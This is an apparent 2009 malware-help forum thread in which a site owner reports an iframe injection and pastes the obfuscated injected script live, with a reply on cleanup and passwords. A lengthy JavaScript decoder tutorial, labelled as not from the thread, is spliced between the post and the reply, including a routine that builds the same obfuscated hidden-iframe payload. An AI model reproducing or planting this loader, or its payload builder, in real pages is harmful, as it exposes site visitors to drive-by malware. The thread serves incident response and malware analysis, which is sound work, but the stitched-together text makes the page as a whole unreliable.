Topic: re: iframe virus / malware infected our site

visi (Guest)
re: iframe virus / malware infected our site
« on: April 30, 2009, 03:20:38 AM »
Hi

It seems our site (on a shared host) has been infected with an iframe virus.

Lots of our HTML / PHP files had iframe code added, pointing to 2 external dodgy-looking websites.

(I have removed most of the code manually and / or copied over with a clean backup.)

At the moment, when we try to upload index.htm or index.html,
the files are removed immediately from the FTP server, so the homepage doesn't load!  ???

Please check out our site:
hxxp://www.visualiminals.com  (HOMEPAGE NOT WORKING as mentioned above)

so please try
hxxp://www.visualiminals.com/products/genius.htm

I also found this script, which looks suspicious  :o

Quote
<script>function c3257948b3q49f1af131e067(q49f1af131e44d){ function q49f1af131e835(){var q49f1af131ec1c=16;return q49f1af131ec1c;} return (eval('pa'+'rseInt')(q49f1af131e44d,q49f1af131e835()));}function q49f1af131f005(q49f1af131f3ec){  var q49f1af131f7d8='';q49f1af1320773=String['fromCharCode'];for(q49f1af131fbea=0;q49f1af131fbea<q49f1af131f3ec.length;q49f1af131fbea+=2){ q49f1af131f7d8+=(q49f1af1320773(c3257948b3q49f1af131e067(q49f1af131f3ec.substr(q49f1af131fbea,2))));}return q49f1af131f7d8;} var vf1='';var q49f1af1320b5b='3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E696628216D7'+vf1+'96961297'+vf1+'B646F637'+vf1+'56D656E7'+vf1+'42E7'+vf1+'7'+vf1+'7'+vf1+'2697'+vf1+'465287'+vf1+'56E657'+vf1+'363617'+vf1+'065282027'+vf1+'2533632536392536362537'+vf1+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+vf1+'332537'+vf1+'32253633253364253237'+vf1+'2536382537'+vf1+'342537'+vf1+'342537'+vf1+'302533612532662532662537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2532652536322537'+vf1+'322536662536652536662537'+vf1+'342536312536622532652536332536652532662537'+vf1+'302536382537'+vf1+'302536642537'+vf1+'392536312536342536642536392536652532662536392536652536342536352537'+vf1+'382532652537'+vf1+'302536382537'+vf1+'30253366253237'+vf1+'2532622534642536312537'+vf1+'342536382532652537'+vf1+'322536662537'+vf1+'352536652536342532382534642536312537'+vf1+'342536382532652537'+vf1+'32253631253665253634253666253664253238253239253261253331253330253330253332253333253330253239253262253237'+vf1+'253330253333253237'+vf1+'2532302537'+vf1+'37'+vf1+'2536392536342537'+vf1+'34253638253364253337'+vf1+'253337'+vf1+'253331253230253638253635253639253637'+vf1+'2536382537'+vf1+'342533642533312533332533302532302537'+vf1+'332537'+vf1+'342537'+vf1+'39253663253635253364253237'+vf1+'2537'+vf1+'362536392537'+vf1+'332536392536322536392536632536392537'+vf1+'342537'+vf1+'39253361253638253639253634253634253635253665253237'+vf1+'2533652533632532662536392536362537'+vf1+'32
25363125366425363525336527'+vf1+'29293B7'+vf1+'D7'+vf1+'6617'+vf1+'2206D7'+vf1+'969613D7'+vf1+'47'+vf1+'27'+vf1+'5653B3C2F7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E';q49f1af132132c=document;q49f1af132132c.write(q49f1af131f005(q49f1af1320b5b));</script>


We used McAfee Secure, which found 2 possible vulnerabilities:

1) Cross-site scripting vulnerability in the recommend-a-friend popup script

2) Website stats script


I have contacted our host already but any tips to remove the threats and secure the site would be great!

Thank you in advance

« Last Edit: April 30, 2009, 03:25:34 AM by visi »
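The script quoted in the post above is a two-layer obfuscation: the long string is hex, built from fragments glued together with an empty filler variable (`'3C7'+vf1+'3637'+...`), each hex pair is turned into one character with `parseInt(pair, 16)` and `String.fromCharCode`, and the result is passed to `document.write`. That result is itself a small `<script>` that calls `document.write(unescape('%3c%69%66...'))`, a second, percent-encoded layer around the injected markup. The following is an added example, not code from the thread or from avast: a static decoder for that scheme which uses no `eval` and no DOM, so a suspicious file can be read offline instead of executed. The function names, the filler name `vf1`, and the `.invalid` host in the constructed sample are this example's own; the only real data used is the opening fragment `'3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E'` from the quoted script.

```javascript
// Added example, not from the forum post: static decoder for the two-layer
// hex-then-unescape obfuscation seen in the quoted script. Nothing here is
// executed as code; the payload is only transformed as text.
// Assumed names: extractHexPayload, hexPairsToString, unescapeLayer,
// decodeUnescapeCalls, findIframeSrcs, decodeInjectedScript, buildSample.

// Layer 1, step a: find the `'hex'+filler+'hex'+...` run and join the
// fragments. The longest such run in the script text is taken as the payload.
function extractHexPayload(script, filler = "vf1") {
  const glue = `\\s*\\+\\s*${filler}\\s*\\+\\s*`;
  const run = new RegExp(`'[0-9A-Fa-f]*'(?:${glue}'[0-9A-Fa-f]*')*`, "g");
  let best = "";
  for (const m of script.match(run) || []) {
    const joined = m.replace(new RegExp(glue, "g"), "").replace(/'/g, "");
    if (joined.length > best.length) best = joined;
  }
  return best;
}

// Layer 1, step b: two hex digits per character, which is exactly what the
// malware's parseInt(x, 16) / String.fromCharCode loop does.
function hexPairsToString(hex) {
  if (hex.length % 2 !== 0) throw new Error("odd-length hex payload");
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    const code = parseInt(hex.slice(i, i + 2), 16);
    if (Number.isNaN(code)) throw new Error(`bad hex pair at offset ${i}`);
    out += String.fromCharCode(code);
  }
  return out;
}

// Layer 2: reimplementation of JS unescape() (%XX and %uXXXX forms) so the
// percent-encoded argument is decoded without calling the deprecated global.
function unescapeLayer(s) {
  return s.replace(/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Pull every unescape('...') argument out of the layer-1 text and decode it.
function decodeUnescapeCalls(text) {
  const out = [];
  for (const m of text.matchAll(/unescape\(\s*'([^']*)'\s*\)/g)) out.push(unescapeLayer(m[1]));
  return out;
}

// List iframe src values in decoded markup: the hosts to block and report.
function findIframeSrcs(html) {
  const out = [];
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/gi;
  for (const m of html.matchAll(re)) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// End to end: obfuscated script text in, both decoded layers and iframe targets out.
function decodeInjectedScript(script, filler = "vf1") {
  const layer1 = hexPairsToString(extractHexPayload(script, filler));
  const layer2 = decodeUnescapeCalls(layer1);
  return { layer1, layer2, iframeSrcs: layer2.flatMap(findIframeSrcs) };
}

// Constructed sample (NOT the real payload): the same two-layer structure
// wrapped around a hidden iframe pointing at a non-routable .invalid host.
function buildSample(iframeSrc) {
  const inner = `<iframe src='${iframeSrc}' width=1 height=1 style='visibility:hidden'></iframe>`;
  const pct = Array.from(inner, c => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
  const layer1 = `<script>if(!m){document.write(unescape('${pct}'));}var m=true;</script>`;
  const hex = Array.from(layer1, c => c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
  // Odd-length fragments glued with the filler, as in the quoted script.
  const frags = hex.match(/.{1,5}/g);
  return `var vf1='';var p='${frags.join("'+vf1+'")}';document.write(decode(p));`;
}

// Real opening fragment from the quoted script: it decodes to "<script>".
const QUOTED_OPENING = "'3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E'";

if (typeof require !== "undefined" && require.main === module) {
  console.log(hexPairsToString(extractHexPayload(QUOTED_OPENING)));
  console.log(decodeInjectedScript(buildSample("http://bad.invalid/a.php")));
}
```

To inspect the real sample, paste the quoted `<script>` text (with `<` and `>` restored if they were defanged) into a file, read it as a string, and pass it to `decodeInjectedScript`; the `iframeSrcs` field gives the hosts to block at the firewall and report to the registrar. The decoder only ever transforms text, so it is safe to run on a live sample, which the original script is not.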

DavidR
Re: re: iframe virus / malware infected our site
« Reply #1 on: April 30, 2009, 03:46:20 AM »
I get a 403 permissions error on the home page.

No alert on the products/genius.htm page.
I presume you have removed the malicious code from that page?

Can you modify your post? By copying the script into this page, avast could possibly alert on this page; although it didn't, it isn't advised to leave it unadulterated.

Change the < > characters to ^ ^ or something like that, so it can't possibly be interpreted as a script command.

Change your passwords for uploading, any modification of files, content management software, etc. Old versions of PHP can be vulnerable to exploit, so you need to ensure that they are fully up to date.
« Last Edit: April 30, 2009, 03:48:47 AM by DavidR »